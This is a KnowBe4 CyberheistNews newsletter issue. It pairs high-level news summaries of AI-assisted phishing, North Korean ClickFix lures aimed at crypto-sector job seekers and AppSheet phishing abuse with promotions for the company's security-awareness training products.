CyberheistNews Vol 15 #38 Why Does Protecting AI Agents Need To Be Status Quo?

Why Does Protecting AI Agents Need To Be Status Quo?

By Roger Grimes

Protecting humans means protecting the tools humans use.

Human risk management (HRM) means reducing human-based risk, or in our particular area, human-based cybersecurity risk. Study after study has shown that, in one way or another, humans are involved in the vast majority of cybersecurity incidents.

Sometimes it is humans being tricked into making faulty security decisions by social engineering. Other times, it is making faulty choices that end up lessening security protections or accidentally sending confidential info to the wrong people.

Human risk even involves maliciously-minded employees who do not have their employer’s best interests at heart — insider threat. There are myriad ways that humans are involved in making decisions and performing actions that result in cyber compromises.

Much of HRM involves training. Training in how to recognize, mitigate and report threats (i.e., security awareness training), coaching in how to make better security decisions, and education in how to securely configure systems.

Of course, using cybersecurity tools and products to prevent threats from getting to users, where they have to make critical security decisions in the first place, is even better. KnowBe4 and its products are directly involved in all of that.

[CONTINUED] Blog post with links:
https://blog.knowbe4.com/protecting-ai-agents-will-be-status-quo

[Live Demo] Intelligent Email Defense: Automate, Remediate and Train from One Platform

As cyber attackers continue to outpace traditional defenses, it’s not a question of if, but when sophisticated attacks will bypass your email security controls.

Phishing attacks are surging at an unprecedented 1,265% rate since 2022, largely driven by AI advancements. Most concerning, 31% of IT teams take more than five hours to respond to reported security issues, leaving your organization vulnerable during those critical hours when threats remain active in your users’ inboxes.

During this demo, you’ll discover how PhishER Plus can help take control back from rising AI phishing risks by:

• Transforming your users into active threat sensors with one-click reporting via the Phish Alert Button
• Accelerating response times with AI-powered automation that reduces manual email review by 85-99%
• Providing comprehensive threat intelligence from a network of 13+ million global users and third-party integrations
• Removing threats automatically from all mailboxes with PhishRIP before users can interact with them
• Converting real attacks into targeted training opportunities with PhishFlip

Discover how PhishER Plus combines AI and human intelligence to transform your users from security risks into your most valuable defenders.

Date/Time: TOMORROW, Wednesday, September 24 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/phisher-demo-3?partnerref=CHN2

AI-Assisted Phishing Attacks Are an Increasingly Serious Threat

AI-assisted phishing attacks pose a significant and increasing threat to orgs, according to Matt Weidman, partner and vice president of Commercial Property & Casualty at USIA.

In an article for CBIA, Weidman explains that attackers can use AI tools to craft targeted, convincing phishing messages that are almost indistinguishable from the real thing.

“Personalization and social engineering: AI can analyze vast datasets, including social media posts, websites, and public records, to craft highly tailored messages,” Weidman says. “It can be trained to mimic writing styles to appear authentic, reference specific details (e.g., recent purchases, ongoing projects) to seem legitimate, and even clone the voice of business leaders or generate realistic videos to make fraudulent yet convincing messages.”

In addition to improving the content of the phishing messages, AI can help attackers substantially increase output on a massive scale.

“Because AI can increase cybercriminals’ output volume and enhance the sophistication of their tactics, employees may encounter multiple fraudulent messages on a daily basis,” Weidman says. “The combination of frequent attempts and convincingly crafted messages may increase the likelihood that a business will fall victim to one of these scams.”

Security awareness training gives organizations an essential layer of defense against these attacks. “Staff should receive ongoing security awareness training that teaches them about the latest cybersecurity threats and hackers’ newest tactics,” Weidman says.

“Businesses should conduct phishing simulations to help employees recognize and respond effectively to fraudulent communications. Employees should feel empowered to verify requests for sensitive information before responding to them, especially those involving financial transactions or credential sharing, and they should be encouraged to report suspicious activities.”

KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 HRM+ platform to strengthen their security culture and reduce human risk.

Blog post with links:
https://blog.knowbe4.com/ai-assisted-phishing-attacks-are-an-increasingly-serious-threat

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training. his is precisely what our AI Defense Agents provide.

​​Join us for a demo showcasing KnowBe4’s leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4’s HRM+ platform:

• SmartRisk Agent™ – Generate actionable data and metrics to help you lower your organization’s human risk score
• Template Generator Agent – Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
• Automated Training Agent – Automatically identify high-risk users and assign personalized training
• Knowledge Refresher Agent and Policy Quizzes Agent – Reinforce your security program and organizational policies.
• Enhanced Executive Reports – Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization’s risk while saving your team valuable time.

Date/Time: Wednesday, October 1 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-1?partnerref=CHN

North Korean Hackers Target Job Seekers With ClickFix Attacks

North Korean hackers behind the “Contagious Interview” campaign are using the ClickFix social engineering tactic to target job seekers with phony employment offers, according to researchers at SentinelOne.

“ClickFix typically proceeds as follows,” the researchers explain. “A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment.

“During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process.”

The attackers are primarily targeting marketing and finance employees at cryptocurrency companies, using “lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.”

The attackers frequently rotate their infrastructure to stay ahead of defenders, setting up new domains to avoid detection.

“Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes,” the researchers write.

“We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.”

The researchers conclude, “[A] critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.”

Blog post with links:
https://blog.knowbe4.com/north-korean-hackers-target-job-seekers-with-clickfix-attacks

A Strategic Framework for Human Risk Management: What is HRM and Why Do Organizations Need It?

Cybersecurity isn’t just about technology. The human element remains a primary factor in 68% to 90% of security breaches. But this isn’t a time to point fingers at your users.

In reality, users make mistakes. Even when they understand cyber attack dangers, they may not have time to fully process them. Meanwhile, AI-amplified social engineering attacks make attacks more deliverable and that much harder to spot.

How can you expect your employees to detect attacks when traditional detection technology cannot? This leaves your organization with a critical strategic gap in your security posture. And what better to bridge the gap with than human risk management (HRM)—a strategy that moves beyond simple awareness to systematically identify, measure, and mitigate human-derived risk through a continuous, data-driven process.

Download this whitepaper to:

• Discover the core principles of modern HRM
• Learn how to implement the DEEP model (Defend, Educate, Empower, and Protect)
• Discover why the adoption of an integrated, AI-driven HRM platform is the most effective means of engaging employees
• Build robust security cultures using proven principles of organizational behavior

Don’t let human risk remain your biggest security blind spot. Download the whitepaper and get the proven framework for systematic human risk management.

Download Now:
https://info.knowbe4.com/strategic-framework-human-risk-management-wp-em

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-38-why-does-protecting-ai-agents-need-to-be-status-quo

Report: SMBs Face Surge in Cyberattacks Assisted by AI Tools

Cyberattacks against small and medium-sized businesses (SMBs) nearly doubled in the first half of 2025, according to a new report from Guardz.

“Phishing remains the most prevalent initial attack vector in breaches, accounting for roughly one-fifth of incidents. SMBs are particularly vulnerable due to limited security training and high trust within small teams. However, generic phishing attacks have declined as attackers increasingly use stolen credentials to gain access quietly. Phishing is becoming more targeted and sophisticated.”

The researchers also observed a significant increase in business email compromise (BEC), often assisted by generative AI tools.

“[BEC] scams surged against SMBs, causing significant financial losses globally ,” the report says. “BEC attackers impersonate trusted parties to request fraudulent payments or sensitive data. Employees at small businesses face significantly more social engineering attacks than those at larger companies.

Generative AI is a game-changer, enabling cybercriminals to craft polished, personalized scam emails and deepfake voice impersonations. This technology increases the scale and believability of attacks, making detection harder.

SMBs are responding by increasing security awareness efforts, but gaps remain. Phishing in 2025 remains a shape-shifting threat, still the most common attack vector, but increasingly more complex to detect.”

The researchers also observed an increase in ransomware attacks, noting that small businesses are particularly vulnerable to downtime. “A few top ransomware gangs are responsible for almost half of all reported attacks, reflecting a concentrated ecosystem,” Guardz warns.

“Attackers perceive SMBs as having weaker defenses and limited incident response capabilities, making them easier targets. Many SMB victims lack robust data backups or redundant systems, increasing pressure to pay ransoms.”

Guardz has the story:
https://guardz.com/blog/small-business-cyberattacks-rise-in-2025-guardz-mid-year-findings/

Attackers Abuse Google’s AppSheet to Send Phishing Emails

Hackread reports that attackers are abusing Google’s AppSheet platform to send phishing emails. The campaign was spotted by researchers at Raven, who warn that attackers are sending messages that impersonate AppSheet, informing users of phony trademark violations.

Notably, the emails are sent from AppSheet’s legitimate infrastructure, making them more likely to bypass security controls and appear legitimate to human recipients.

“As a Google Cloud service, AppSheet inherits the trust and reputation that organizations place in Google’s infrastructure,” the researchers write. “When employees see ‘appsheet.com’ in their inbox, they naturally associate it with the same security standards they expect from Gmail or Google Drive.

With millions of business users building applications on the platform, AppSheet communications are common in corporate environments, making malicious emails appear routine.”

Attackers have abused AppSheet for this purpose since at least March 2025, accounting for a good chunk of global phishing emails. Attackers are always looking for ways to slip past security filters and are increasingly abusing legitimate platforms to evade detection.

“This AppSheet campaign represents a broader trend of legitimate service abuse,” the researchers explain. “Attackers are discovering they can achieve better results by using trusted platforms rather than building their own infrastructure.”

Erich Kron, security awareness advocate at KnowBe4, told Hackread in a statement, “The reliance on commonly used or well-known brands in social engineering attacks is nothing new; however, these attacks still remain quite effective.

These types of attacks are meant to blend in with normal day-to-day activities, further increasing the trust level of the potential victim.” New-school security awareness training can give your organization an essential layer of defense by teaching your employees to recognize red flags associated with social engineering attacks.

Hackread has the story:
https://hackread.com/google-appsheet-phishing-scam-fake-trademark-notices/

What KnowBe4 Customers Say

“It’s genuinely hard to believe that this email is actually from the CEO of the company. However, on the off chance that it truly is you, I wanted to share some feedback regarding our experience with KnowBe4.

We’ve been very pleased with the platform. As an important point, prior to making our purchase, we were evaluating three competitors. Ultimately, we chose to contract with KnowBe4 primarily because your sales process was exceptionally responsive and straightforward.

A very friendly individual quickly answered our questions, we coordinated a meeting where the tool was clearly explained, and we were even given a 30-day trial period to experiment with it. The entire experience felt very easy and fluid.

This stands in stark contrast to the other two competitors we considered. It’s almost unbelievable, but they didn’t respond quickly – and by “quickly,” I’m not referring to a matter of hours, but rather one or two days. On top of that, they didn’t offer a trial, and their sales representatives didn’t come across as particularly friendly.

In summary, congratulations on having such an excellent sales process!

– C.F. Head of Security